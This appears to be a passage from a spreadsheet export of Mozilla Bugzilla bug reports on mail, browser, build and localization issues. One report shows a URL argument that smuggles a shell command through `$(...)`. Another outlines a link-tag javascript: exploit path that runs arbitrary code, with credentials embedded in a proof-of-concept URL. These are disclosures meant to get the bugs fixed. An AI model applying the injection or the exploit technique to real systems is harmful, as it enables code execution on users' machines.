trunk buildid:   2001060506 on all platforms
Logging this bug after talking to Bhuvan. Biff does not fetch mail for the 2nd 
account onwards when password is saved in the password manager.
Steps
Create a new profile 
Launch mail application
Create 3 accounts (imap pop webmail)
Log into each account and save password in the password manager(check the 
checkbox 'Use password manager to remember the password')
Also make sure biff settings are enabled for all the above accounts in that 
profile
Close mail and launch again
compose a new mail message to all the 3 accounts
Send this message
Actual results: Biff fires only for the first account and the mail is retrieved. 
 for the first account only.  
Biff does not fetch mail for the 2nd and 3rd account unless you click on get msg 
button for each account. 
Expected: Biff should fetch message for all the accounts at specified interval. 
 Biff should check for the password for each account when password is saved in 
the password manager without having to click on 'get message' button for each 
account for biff to work onwards in that session.</t>
  </si>
  <si>
    <t>sheelar</t>
  </si>
  <si>
    <t>THUNDERBIRD-471223</t>
  </si>
  <si>
    <t>Remove vestigal tag-anchor.gif</t>
  </si>
  <si>
    <t>Created attachment 354525
Fix v.1
Not quite up to my usual CVS archaeology standards but:
At some point in the past in the pre-1.0-era before smileys were part of the theme we decided to fork editor's packaging so we could package up just the smileys instead of all the images in editor/ui/composer/content/icons/. Then after that we realized that although we don't need things like tag-body.gif which Composer shows when you enter the Show icons for all HTML tags mode that we don't have  shows tag-anchor.gif even in the normal view so Insert - Named Anchor would have... probably shown a broken image icon or maybe just nothing so we added mail/components/compose/content/icons/tag-anchor.gif.
Then smileys moved to the theme and (here's where my archaeology breaks down) whatever it was that was letting us find editor/content/ things in messenger.jar rather than comm.jar was removed and we went back to packaging all of editor/ui/composer/content/icons/ (or maybe we never changed anywhere other than on the aviary branch) so now we're just jarring up something which nothing can access since there's no .manifest saying to either look for content editor there or to overlay any editor/content/ URI with anything from there.
(Doing some restriction of what composer bits and bobs we package wouldn't be a bad thing but copying the files is the wrong approach: we should either ifdef editor/ui/jar.mn (particularly reasonable given the way we already do ifdef editor/ui/locales/jar.mn) or do what we do with mailnews/jar.mn ifdeffing the whole thing and jarring what we want with absolute paths from a file in mail/ instead.)</t>
  </si>
  <si>
    <t>CORE-481647</t>
  </si>
  <si>
    <t>[FIX]Internal frame with generated src by javascript  is not working properly in FF 3.0.7 used to work in FF 3.0.6</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux x86_64 en-US rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6
Build Identifier: Mozilla/5.0 (X11 U Linux x86_64 en-US rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.7
Inline frames that have scr generated by javascipt for example .....')document.close()&gt; are not working properly. Inline frame will be displayed but form inside this internal frame that contains input[type='file'] will not be submitted when clicking on submit button.
Reproducible: Always
Steps to Reproduce:
1.Create page containing  &gt;')&gt;. Inline frame should contain form that will upload file to the server and submit button.
2.Click on submit button
3.
Actual Results:  
Submit button does nothing nothing is logged no event
Expected Results:  
Form should be submitted</t>
  </si>
  <si>
    <t>dragan.spirov</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-402016</t>
  </si>
  <si>
    <t>tinderbox generating buildid that's an hour off</t>
  </si>
  <si>
    <t>Tindexbox generating buildid's that are an hour off.
Probably due to new US daylight saving time rules not being implemented.</t>
  </si>
  <si>
    <t>aja+bugzilla</t>
  </si>
  <si>
    <t>MARKETING-452063</t>
  </si>
  <si>
    <t>Thunderbird logo misuse</t>
  </si>
  <si>
    <t>T.E.Baldwin99@members.leeds.ac.uk writes:
It has come to my attention that on 
http://www.quidco.com/quidclans/view/hotmail-quidclan there is a dubious use 
of the Thunderbird logo.
Not sure if this is worth pursuing but thought I'd let you know.
Gerv</t>
  </si>
  <si>
    <t>CORE-98663</t>
  </si>
  <si>
    <t>PresShell misuses InsertRule()</t>
  </si>
  <si>
    <t>PresShell has been misusing InsertRule() all along.  It was concatenating a
bunch of rules together and then calling InsertRule() on the whole string.  Now
that I've changed InsertRule() to only parse a single rule (this seems more in
keeping with the spec) this no longer works.  To test:
1)  Set Use my colors and ignore the document's preference in prefs
2)  Go to www.mozilla.org
Expected:  uses default color/background
Actual: uses page's color/background</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-342681</t>
  </si>
  <si>
    <t>Small issue: Translation mistake in one of the error pages (Spanish)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 es-ES rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 es-ES rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
One of the error pages in Spanish (Spain) version of Firefox has as mistake since it includes the same sentence in Spanish and English:
___
Archivo no encontrado
Firefox no puede encontrar el archivo en /xxxxxxxx/xxxxxxxxxxxx.xxx.
    *   Compruebe que ha escrito correctamente las mayÃºsculas en el nombre del ficheroCheck the file name for capitalization or other typing errors.
    *   Compruebe que el fichero no haya sido movido renombrado o eliminado.
___
As you can see there are two sentences (one in Spanish and the other in English) merged into one. The correct sentence should be something like: Compruebe que ha escrito correctamente las mayÃºsculas en el nombre del fichero o cualquier otro error al teclear.
Reproducible: Always
Steps to Reproduce:
Get to that error message in Spanish (Spain) version of Firefox. That error appeared in my machine while having an incorect TEMP environment variable (it pointed to a non-existent hard disk drive since I took that disk off the computer).
Actual Results:  
Got the above reproduced error message with that mistake in the translation.
Expected Results:  
A well translated error message )
...or even no error message at all! (see below suggestion in Additional Information)
Apart from fixing that small mistake maybe Firefox could be modified so if the user has a wrongly set TEMP/TMP variable (for example a non-existent X:\Temp) it falls back to a default C:\Temp or something like that instead of showing an error message which doesn't even clue about having a wrong TEMP variable (I discovered that was the source of the problem after some fiddling).
Or maybe it would be enough to warn the user about having a TEMP variable pointing to an inexistent disk instead of that generic File not found message which doesn't help much to find what's the problem.</t>
  </si>
  <si>
    <t>oma2000</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-334015</t>
  </si>
  <si>
    <t>repeat index() doesn't reset to 0 when last repeat item is deleted</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20060411 Firefox/3.0a1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20060411 Firefox/3.0a1
1.0 2ed test suite case 9.3.6.a shows a index() == 1 when
all repeat items have been removed (when it should be == 0)
See related bug 282828
Reproducible: Always</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-314612</t>
  </si>
  <si>
    <t>Autocomplete broken in Location bar</t>
  </si>
  <si>
    <t>Location bar autocomplete no longer works in the 10/31 trunk nightly. It worked in the 10/30 trunk nightly. It still works in the 10/31 branch nightly (but for how long?).
This is REALLY annoying.</t>
  </si>
  <si>
    <t>CORE-238710</t>
  </si>
  <si>
    <t>mozilla 1.7b interprets shell caracters in url when launched from command line</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.5) Gecko/20040130 Firebird/0.7
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7b) Gecko/20040316
try mozilla 'http://$hostname' or mozilla 'http://plop.org/$(xeyes)'. With 1.6
nothing is interpreted with 1.7b the url is replaced by the hostname and
xeyes is launched.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.
Actual Results:  
a potential security problem
version 1.6 does not exhibit this problem. Firefox appears to have the same bug.</t>
  </si>
  <si>
    <t>hules</t>
  </si>
  <si>
    <t>CORE-503283</t>
  </si>
  <si>
    <t>unbounded globalCompositeOperations are terribly broken</t>
  </si>
  <si>
    <t>Build ID:
Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.2a1pre) Gecko/20090708 Minefield/3.6a1pre
Steps to reproduce:
See the above URL.
Actual result:
source-in source-out destination-in and destination-atop are not rendered at all.
Expected result:
Some sort of composition result should be rendered.
Fx 3.5 (Mozilla/5.0 (Windows U Windows NT 5.1 ja rv:1.9.1) Gecko/20090624 Firefox/3.5) also fails. Fx 3.0.11 (Mozilla/5.0 (Windows U Windows NT 5.1 ja rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11) seems to work.</t>
  </si>
  <si>
    <t>CORE-398243</t>
  </si>
  <si>
    <t>[FIX]Form controls can be reset on reload</t>
  </si>
  <si>
    <t>Created attachment 283154
testcase
I'm not 100% if I understand the exact circumstances where this happens but something like this: if a page contains form controls not inside a  then on reload only the first control on the page retains its state and all the others are reset.
Because it doesn't happen in a  this might not seem like a blocker at first sight but it's a regression and it might also be a symptom of something more serious.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS-464662</t>
  </si>
  <si>
    <t>moz2-darwin8-slave01 02 have outdated versions of buildbot on them don't do Mercurial well</t>
  </si>
  <si>
    <t>I'm not sure how this happened by the latest attempt by this slave to pull and update m-c gave the following:
pulling from http://hg.mozilla.org/mozilla-central
searching for changes
adding changesets
adding manifests
adding file changes
added 8 changesets with 6 changes to 10 files (+2 heads)
not updating since new heads added
(run 'hg heads' to see heads 'hg merge' to merge)
So it never updated to the newest revision and is still failing tests. It is running another cycle now I'm not sure if that will resolve it but otherwise we probably need to clobber this and maybe change updating to do a pull then update to get around this in the future.</t>
  </si>
  <si>
    <t>CORE-255914</t>
  </si>
  <si>
    <t>Editor code shouldn't try to create elements with empty nodename</t>
  </si>
  <si>
    <t>nsEditor::CreateHTMLContent is sometimes called with an emtpy nodename (aTag).
For example nsHTMLEditRules::JoinBlocks somteimes calls
nsHTMLEditRules::ConvertListType with an empty aListType which ends up in
CreateHTMLContent through nsEditor::ReplaceContainer.</t>
  </si>
  <si>
    <t>NSS-61749</t>
  </si>
  <si>
    <t>changes to blapi.c cause build failure on AIX</t>
  </si>
  <si>
    <t>saw from the log that you made a big change yesterday maybe this is the cause for:
/h/hs-sca15c/export/builds/mccrel/nss/nsstip/logs/20001201.1/raven_AIX4.3/gmake-idgfull64-domestic.log.1.err...
gmake[3]: Entering directory
`/h/hs-sca15c/export/builds/mccrel/nss/nsstip/builds/20001201.1/y2sun2_Solaris8/mozilla/security/nss/cmd/bltest'
xlC_r -o AIX4.3_64_IDG.OBJ/blapitest.o -c -g -DAIX -DSYSV -qarch=com -O2
-DAIX_64BIT -DAIX4_3 -DXP_UNIX -DDEBUG -UNDEBUG -DDEBUG_svbld
-I../../../../dist/AIX4.3_64_IDG.OBJ/include  -I../../../../dist/public/security
-I../../../../dist/private/security -I../../../../dist/public/seccmd
-I../../../../dist/public/dbm  blapitest.c
blapitest.c line 186.19: 1506-280 (E) Function argument assignment between
types const char* and unsigned char* is not allowed.
blapitest.c line 375.20: 1506-275 (S) Unexpected text '' encountered.
blapitest.c line 582.23: 1506-068 (E) Operation between types unsigned
char* and char* is not allowed.
blapitest.c line 660.49: 1506-280 (E) Function argument assignment between
types unsigned char* and char* is not allowed.
blapitest.c line 669.42: 1506-280 (E) Function argument assignment between
types unsigned char* and char* is not allowed.
blapitest.c line 748.42: 1506-068 (E) Operation between types enum
_SECStatus(*)(void*unsigned char*unsigned int*unsigned intunsigned
char*unsigned int) and enum _SECStatus(*)(struct DESContextStr*unsigned
char*unsigned int*unsigned intunsigned char*unsigned int) is not allowed.
blapitest.c line 750.42: 1506-068 (E) Operation between types enum
_SECStatus(*)(void*unsigned char*unsigned int*unsigned intunsigned
char*unsigned int) and enum _SECStatus(*)(struct DESContextStr*unsigned
char*unsigned int*unsigned intunsigned char*unsigned int) is not allowed.
blapitest.c line 790.42: 1506-068 (E) Operation between types enum
_SECStatus(*)(void*unsigned char*unsigned int*unsigned intunsigned
char*unsigned int) and enum _SECStatus(*)(struct RC2ContextStr*unsigned
char*unsigned int*unsigned intunsigned char*unsigned int) is not allowed.
blapitest.c line 792.42: 1506-068 (E) Operation between types enum
_SECStatus(*)(void*unsigned char*unsigned int*unsigned intunsigned
char*unsigned int) and enum _SECStatus(*)(struct RC2ContextStr*unsigned
char*unsigned int*unsigned intunsigned char*unsigned int) is not allowed.
blapitest.c line 819.42: 1506-068 (E) Operation between types enum
_SECStatus(*)(void*unsigned char*unsigned int*unsigned intunsigned
char*unsigned int) and enum _SECStatus(*)(struct RC4ContextStr*unsigned
char*unsigned int*unsigned intconst unsigned char*unsigned int) is not allowed.
blapitest.c line 821.42: 1506-068 (E) Operation between types enum
_SECStatus(*)(void*unsigned char*unsigned int*unsigned intunsigned
char*unsigned int) and enum _SECStatus(*)(struct RC4ContextStr*unsigned
char*unsigned int*unsigned intconst unsigned char*unsigned int) is not allowed.
blapitest.c line 890.41: 1506-068 (E) Operation between types enum
_SECStatus(*)(void*unsigned char*unsigned char*) and enum
_SECStatus(*)(struct RSAPublicKeyStr*unsigned char*unsigned char*) is not
allowed.
blapitest.c line 892.41: 1506-068 (E) Operation between types enum
_SECStatus(*)(void*unsigned char*unsigned char*) and enum
_SECStatus(*)(struct RSAPrivateKeyStr*unsigned char*unsigned char*) is not
allowed.
blapitest.c line 946.41: 1506-068 (E) Operation between types enum
_SECStatus(*)(void*unsigned char*unsigned char*) and enum
_SECStatus(*)(struct DSAPrivateKeyStr*struct SECItemStr*struct SECItemStr*)
is not allowed.
blapitest.c line 962.41: 1506-068 (E) Operation between types enum
_SECStatus(*)(void*unsigned char*unsigned char*) and enum
_SECStatus(*)(struct DSAPublicKeyStr*struct SECItemStr*struct SECItemStr*) is
not allowed.
blapitest.c line 986.25: 1506-196 (E) Initialization between types unsigned
char* and const unsigned char* is not allowed.
blapitest.c line 1026.25: 1506-196 (E) Initialization between types unsigned
char* and const unsigned char* is not allowed.
blapitest.c line 1066.25: 1506-196 (E) Initialization between types unsigned
char* and const unsigned char* is not allowed.
blapitest.c line 1192.39: 1506-068 (E) Operation between types enum
_SECStatus(*)(unsigned char*unsigned char*unsigned int) and enum
_SECStatus(*)(unsigned char*const unsigned char*unsigned int) is not allowed.
blapitest.c line 1199.39: 1506-068 (E) Operation between types enum
_SECStatus(*)(unsigned char*unsigned char*unsigned int) and enum
_SECStatus(*)(unsigned char*const unsigned char*unsigned int) is not allowed.
blapitest.c line 1206.39: 1506-068 (E) Operation between types enum
_SECStatus(*)(unsigned char*unsigned char*unsigned int) and enum
_SECStatus(*)(unsigned char*const unsigned char*unsigned int) is not allowed.
blapitest.c line 1286.50: 1506-280 (E) Function argument assignment between
types unsigned int* and int* is not allowed.
blapitest.c line 1292.49: 1506-280 (E) Function argument assignment between
types unsigned int* and int* is not allowed.
gmake[3]: *** [AIX4.3_64_IDG.OBJ/blapitest.o] Error 1
gmake[3]: Leaving directory
`/h/hs-sca15c/export/builds/mccrel/nss/nsstip/builds/20001201.1/y2sun2_Solaris8/mozilla/security/nss/cmd/bltest'
---------
gmake[2]: *** [libs] Error 2
gmake[2]: Leaving directory
`/h/hs-sca15c/export/builds/mccrel/nss/nsstip/builds/20001201.1/y2sun2_Solaris8/mozilla/security/nss/cmd'
---------
gmake[1]: *** [libs] Error 2
gmake[1]: Leaving directory
`/h/hs-sca15c/export/builds/mccrel/nss/nsstip/builds/20001201.1/y2sun2_Solaris8/mozilla/security/nss'</t>
  </si>
  <si>
    <t>THUNDERBIRD-439380</t>
  </si>
  <si>
    <t>Unread counts incorrect after IMAP filter move</t>
  </si>
  <si>
    <t>When moving a message from an IMAP folder during a filter operation the unread count is off by one (one less unread is indicated than is present) This is a regression that is not present in the 2008-06-13 nightly but is present in 2008-06-14. Likely cause: bug 435153
STR:
Create an IMAP account with an inbox and a subfolder (called TEST). Add at least one message to the INBOX folder and mark it as unread. Create a message filter for the IMAP account that moves a message from the INBOX to the subfolder TEST if for example the subject contains moveme.
Send a message to the IMAP account that matches the filter. The message moves to the TEST folder.
Expected result: unread count on INBOX remains unchanged.
Actual result: unread count on INBOX is decremented by one.</t>
  </si>
  <si>
    <t>CORE-346843</t>
  </si>
  <si>
    <t>enable nsSigHandlers trapping for x86_64</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux x86_64 en-US rv:1.8.1b1) Gecko/20060801 BonEcho/2.0b1
Build Identifier: Mozilla/5.0 (X11 U Linux x86_64 en-US rv:1.8.1b1) Gecko/20060801 BonEcho/2.0b1
patch coming
Reproducible: Always</t>
  </si>
  <si>
    <t>CORE-408148</t>
  </si>
  <si>
    <t>nsXBLService::GetBinding should use nsAutoTArray rather than nsTArray</t>
  </si>
  <si>
    <t>Created attachment 292908
fix
per dtrace and 55070 comment 18 6 is still the right number.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-431534</t>
  </si>
  <si>
    <t>Make sure to point to the new JA add-ons site</t>
  </si>
  <si>
    <t>See https://intranet.mozilla.org/Japan/Firefox3/DomainTransition for the transition plan.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-489903</t>
  </si>
  <si>
    <t>talos reboots (20090423)</t>
  </si>
  <si>
    <t>qm-mini-vista01
qm-pxp-slave01
qm-pxp-stage01</t>
  </si>
  <si>
    <t>MARKETING-246425</t>
  </si>
  <si>
    <t>Testimonial: awesome</t>
  </si>
  <si>
    <t>robertlash@comcast.net wrote:
This browser is absolutely awesome.
IE definitely has some thing to worry about.
Great job guys and gals.
I am going to recommend this to everyone.
The trend of open source is now getting to the end users in a professional manner.
Beautiful themes as well that install and run easily.
I am so impressed.
I just got it and haven't gone through and researched any security issues yet
but feel confident that it is solid.
Thank you
Robert Lash</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-93820</t>
  </si>
  <si>
    <t>Moz Opacity does not work properly under linux</t>
  </si>
  <si>
    <t>This web page displays great under win32 (the images slowly fade in and out). 
Under linux the images only appear at 100% opacity.</t>
  </si>
  <si>
    <t>colinp</t>
  </si>
  <si>
    <t>CORE-140635</t>
  </si>
  <si>
    <t>Mozilla access to GNOME URL-handlers for externals</t>
  </si>
  <si>
    <t>GNOME provides a way of setting desktop wide URL-handlers.  Mozilla should be
able to access these if a URL is supposed to handled externally.
This is closely related to bug 128668 and raises the same questions as to
whether Mozilla should be allowed to depend on GNOME headers or if some other
mechanism can be found.  Perhaps the GNOME side could be encouraged to create
some small standard utility (e.g. gnome-handle-url) which could be discovered
and used by Mozilla.  Perhaps it already exists.
I think this is well worth doing since as far as I know GNOME is intended to
be the desktop of choice by a few vendors.
I'm sure KDE has a similar function.  Perhaps something in common with both
could be done.</t>
  </si>
  <si>
    <t>u27431</t>
  </si>
  <si>
    <t>FIREFOX-339196</t>
  </si>
  <si>
    <t>Cleaner wizard image for NSIS installer</t>
  </si>
  <si>
    <t>I threw the original image together in a minute for the trunk and have since cleaned it up. New image coming up shortly.</t>
  </si>
  <si>
    <t>NSS-412311</t>
  </si>
  <si>
    <t>Replace PR_INTERVAL_NO_WAIT with PR_INTERVAL_NO_TIMEOUT in client initialization calls</t>
  </si>
  <si>
    <t>PR_INTERVAL_NO_WAIT socket option makes client to use non-blocking IO. It is still untested(and apparently broken) feature and so it should not be used until verified(or fixed).</t>
  </si>
  <si>
    <t>CORE-290036</t>
  </si>
  <si>
    <t>Link tag allows to execute arbitrary code without user interaction</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.7) Gecko/20050408 Firefox/1.0.3
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.7) Gecko/20050408 Firefox/1.0.3
The link tag allows to load a custom image as the icon for a website displayed
in the location bar and in the tab title. By setting the href attribute of this
tag to a javascript url it is possible to call chrome functions and run
arbitrary code without user interaction.
Reproducible: Always
Steps to Reproduce:
1. Open http://bugzilla:kN2P9wk@www.mikx.de/firelinking/
2. Follow instructions
The example is cross platform: On Windows this example creates the file
c:\booom.bat and launches it (opens a dos box with a dir command). On Linux
(tested Fedora Core) and MacOSX the example creates the file ~/booom.txt or
/booom.txt. 
The non-windows examples are only roughly tested. Please don't complain if not
working. The way i need to double encode the backslash on linux looks a little
fishy and i doubt every Mac user can write to root by default. You get full user
rights with UniversalXPConnect so everything else is just a matter of
implementation time.</t>
  </si>
  <si>
    <t>CORE-94375</t>
  </si>
  <si>
    <t>-O3 build will open the window but segv [WAS: gcc3 -O3 Garbage characters in time on status bar.]</t>
  </si>
  <si>
    <t>I've only seen this happen on the following system:
Complete gcc3.0 Linux from scratch build.
Mozilla built with -march=athlon -mcpu=athlon -O3.
With these setting I often get one of the characters : or ? in the second
decimal point or the unit column of the time taken to render.
This happens especially often when drawing one of the debug test pages that
renders very quickly.</t>
  </si>
  <si>
    <t>CORE-14676</t>
  </si>
  <si>
    <t>dlopen() bug in FreeBSD 3.x causes problems with components also impacts Purify on Solaris.</t>
  </si>
  <si>
    <t>FreeBSD 3.x has a bug in its implementation of dlopen().  If the same C++ symbol
is exported from multiple libraries opened with dlopen() every library picks up
the version of the symbol present in the *first* library opened with dlopen.
See  for details on this
FreeBSD bug.
This bug naturally wreaks havoc on Mozilla components both bug 6323 and bug
13154 seem to have been due to it though in each case it's been specifically
fixed (or perhaps worked around) by declaring offending symbols static.
However there is enough copy&amp;pasted code in Mozilla that tracking down every
multiply-defined symbol seems an impossible task.  (I don't currently have any
specific behavioral bugs that can be tracked to this though now that these two
bugs have been fixed so QA can probably take a break on this one.)
The behavior of dlopen() has been changed in FreeBSD 4.0-CURRENT I think this
is why neither of the above two bugs were apparently present on 4.0-CURRENT
machines.
The correct workaround for this bug I think is to force Mozilla to be compiled
with --enable-low-fat on FreeBSD.  This flag strips all symbols except the four
that are required for components (and are opened with dlsym()) from the
component binaries.
Note that on FreeBSD versions prior to 3.3 (or 4.0-CURRENT) you'll want to
apply the fix described in bug 14241 to --enable-low-fat or dlopen() will spew
huge amounts of debugging information.</t>
  </si>
  <si>
    <t>MOZILLA_MESSAGING-464580</t>
  </si>
  <si>
    <t>Spreadthunderbird primary menu links are pointing at stage server</t>
  </si>
  <si>
    <t>Hi Gozer
The primary menu links are pointing at stage even though the links are configured correctly to point at production and the drupal cache has been cleared and the menu router table rebuilt.
Is is there a caching proxy server in front of the spreadthunderbird webhead that could be causing this problem ?
-Paul</t>
  </si>
  <si>
    <t>CORE-252649</t>
  </si>
  <si>
    <t>Libart/Gdi+ backends doing unnecessary path construction</t>
  </si>
  <si>
    <t>nsSVG{LibartGdiPlus}PathGeometry::Update() obtains the covered 'before' region
even if the path hasn't been built before. For new path frames this means that
we're effectively building the same path twice.
Patch coming up.</t>
  </si>
  <si>
    <t>FIREFOX-239684</t>
  </si>
  <si>
    <t>address bar autocomplete does not fill in protocol to url</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.6) Gecko/20040227 Firefox/0.8
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.6) Gecko/20040227 Firefox/0.8
If I start writing url in address bar it offers possible autocompletes. If I
chose one and I started writing with host address it doesn't fill in protocol
until I press enter which is problem if I want to change some part of this
url. If I start writing with protocol everything works ok.
Example:
url https://aa.bb.cc/xxx
I start writing 'aa' whole url appears in list but when I want to change xxx to
xxy https:// disapears so I have to fill it in again.
If I start to write 'https://aa' list is the same and I can edit any part of
url and protocol ramains where it should.
Reproducible: Always
Steps to Reproduce:
1. url https://aa.bb.cc/xxx
2. start writing 'aa'
3. choose from list one and try to edit it
Actual Results:  
protocol part of url disapears
Expected Results:  
Either protocol part should remain or protocol should not apear in the list. I
would prefer first possibility.</t>
  </si>
  <si>
    <t>mkaspar</t>
  </si>
  <si>
    <t>CORE-348864</t>
  </si>
  <si>
    <t>Replace gradient reference loop warnings by console errors</t>
  </si>
  <si>
    <t>See bug 330387 comment 23.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-645351</t>
  </si>
  <si>
    <t>Collector Extension</t>
  </si>
  <si>
    <t>cannot log in to AMO/addons.mozilla.org by pressing 'Log in' button seems broken</t>
  </si>
  <si>
    <t>Firefox 4.0 Windows XP SP 3 32-bit
Add-on collector 2.0
I cannot log in to addons.mozilla.org by pressing 'Log in' button in the collection extension's 'General settings' tab it seems broken. On the first time I try this I can see a throbber in the tab add-ons manager tab's favicon.</t>
  </si>
  <si>
    <t>THUNDERBIRD-284144</t>
  </si>
  <si>
    <t>Tracking Bug For the Preferences Rewrite</t>
  </si>
  <si>
    <t>Tracking bug for the options dialog redesign using the new widgets and style Ben
added for Firefox.</t>
  </si>
  <si>
    <t>SEAMONKEY-322381</t>
  </si>
  <si>
    <t>[Mac] Document new tab switch shortcuts</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-523827</t>
  </si>
  <si>
    <t>Detect hung slaves</t>
  </si>
  <si>
    <t>While trying to deploy a change to production-master this morning I discovered at least 4 slaves were in a stuck state:
moz2-win32-slave18 was gracefully shutting down since the 19th
bm-xserve16 was doing a debug test from the 12th
bm-xserve18 was doing a debug test from the 14th
bm-xserve19 was doing a debug test from the 6th</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-351044</t>
  </si>
  <si>
    <t>ga-IE / Irish</t>
  </si>
  <si>
    <t>XML error blocks start up on ga builds</t>
  </si>
  <si>
    <t>Filing to track status of a fix for a problem that turned up in beta 2 candidate testing...</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-80855</t>
  </si>
  <si>
    <t>fix hostnameIsIllegal() to properly check validity of hostnames and be more robust</t>
  </si>
  <si>
    <t>fix hostnameIsIllegal()in aw-server to be more robust
right now hostnames like ... _ and .foo.bar will get through.</t>
  </si>
  <si>
    <t>THUNDERBIRD-351610</t>
  </si>
  <si>
    <t>Hooks needed from mime parser to message window display and nsMsgHeaderSink</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6
Build Identifier: Thunderbird version 3 alpha 1 (20060811)
The problem here is that Lightning's iMIP support must move information from the mime parser (an nsISimpleMimeConverter) to the messageWindow UI display. We currently use the ObserverService to implement that. However if the user opens multiple iMIP messages then our calendar information can get associated with the incorrect message window or fail to be associated at all. We could better solve this problem if we had some way to coordinate what messageWindow (or what message) will be displaying the contents of the mime code we are currently parsing.
Reproducible: Always
Steps to Reproduce:
1.Install Lightning (0.3 or higher) onto Thunderbird
2. Email yourself two iMIP messages (ones with Calendar events attached in text/caelndar mime format)
3. Open a second three pane thunderbird window
4. Select both messages and note how Lightning's iMIP bar will show for one window not the other vice versa. 
5. Add the events to your calendars and note that sometimes the event added is not the event that was displayed.
Actual Results:  
iMIP Bar not always displayed
Event to be added to calendar is not the event displayed by the HTML Mime rendering in the message.
Expected Results:  
iMIP bar is always displayed
Correct event is always added to the calendar
There have been several ideas on how to fix this.
1. dmose and mscott talked about using the msgHeaderSink::securityInfo attribute. This attribute would be renamed and changed into a HashArray so that any mime handler could use that as a hook to store valid information that other parts of the code could query and use (in much the same way as SMIME uses it).
2. (Perhaps in addition to step 1) We could also extend nsISimpleMimeConverter so that it has access to the Message URL. From the message URL the nsISimpleMimeConverter could work through the interfaces to get the messageWindow and therefore the msgHeaderSink in order to access this new object described in idea 1. This is also very akin to the way SMIME does this please reference: http://lxr.mozilla.org/mozilla/source/mailnews/mime/src/mimecms.cpp#453 to line 492.</t>
  </si>
  <si>
    <t>TREE_MANAGEMENT_GRAVEYARD-991173</t>
  </si>
  <si>
    <t xml:space="preserve">Add TBPL parser support for more Python exceptions of form ^...Exception:  and ^...Error: </t>
  </si>
  <si>
    <t>This would help with things like bug 972377 and friends.</t>
  </si>
  <si>
    <t>emorley</t>
  </si>
  <si>
    <t>CORE-70860</t>
  </si>
  <si>
    <t>[XUL Syntax] Add -moz-box-flex to CSS</t>
  </si>
  <si>
    <t>Flex should be supported on boxes using CSS.  This will also allow
a long-standing bug in trees to be fixed i.e. the ability to specify
a default flex on all outermost .</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-128551</t>
  </si>
  <si>
    <t>Printing: Xprint</t>
  </si>
  <si>
    <t>Printing crashes since checkin of bug 127430</t>
  </si>
  <si>
    <t>I cannot print any pages with images anymore - the Zilla always crashes since
checkin of bug 127430 (throw away nsImageGTK client side copy) ...</t>
  </si>
  <si>
    <t>CLOUD_SERVICES-445182</t>
  </si>
  <si>
    <t>Weave's new Syncing with Weave dialog is too short</t>
  </si>
  <si>
    <t>Created attachment 329488
screenshot 1: during sync process
The Syncing with Weave dialog (which appears when I choose Sync Now or when I quit Firefox) is too short for its content on Linux.
See screenshots.</t>
  </si>
  <si>
    <t>CORE-17703</t>
  </si>
  <si>
    <t>[PP] Can't move toplevel windows to specific coordinates on the desktop</t>
  </si>
  <si>
    <t>Windows open in very different locations on RedHat 6.0 and WinNT (both
are 102808 builds).
1. Load http://client/demo/external/gecko/eden/eden1028/default.html
2. Click here new window opens (different locations on WinNT and Redhat)
3. Click signon (you're not really signing in) two new windows open -- one is
long vertical bar.  Both these appear is significantly different locations for
WinNT and Redhat6.0.
We want the Redhat 6.0 placement to operate like the WinNT.  In other words the
WinNT placement is how the windows should appear.
Perhaps an easier problem is solve is just a way to control new window placement
on RedHat.  For teh demo we don't need the NT and Redhat to be same.
thx
kevin</t>
  </si>
  <si>
    <t>kevinyen</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-440500</t>
  </si>
  <si>
    <t>Webtest</t>
  </si>
  <si>
    <t>Create performance test results database</t>
  </si>
  <si>
    <t>Create a database of the results from performance tests.  Data should include path to repository and code revision configuration of test box test configuration date of test test results.  The web front end should fill this data in.</t>
  </si>
  <si>
    <t>jdpotter</t>
  </si>
  <si>
    <t>CORE-176528</t>
  </si>
  <si>
    <t>need a nsISemanticUnitScanner to support intl spam mail filter</t>
  </si>
  <si>
    <t>beard send me a proposal. but I change it due to the difficulty to remove malloc
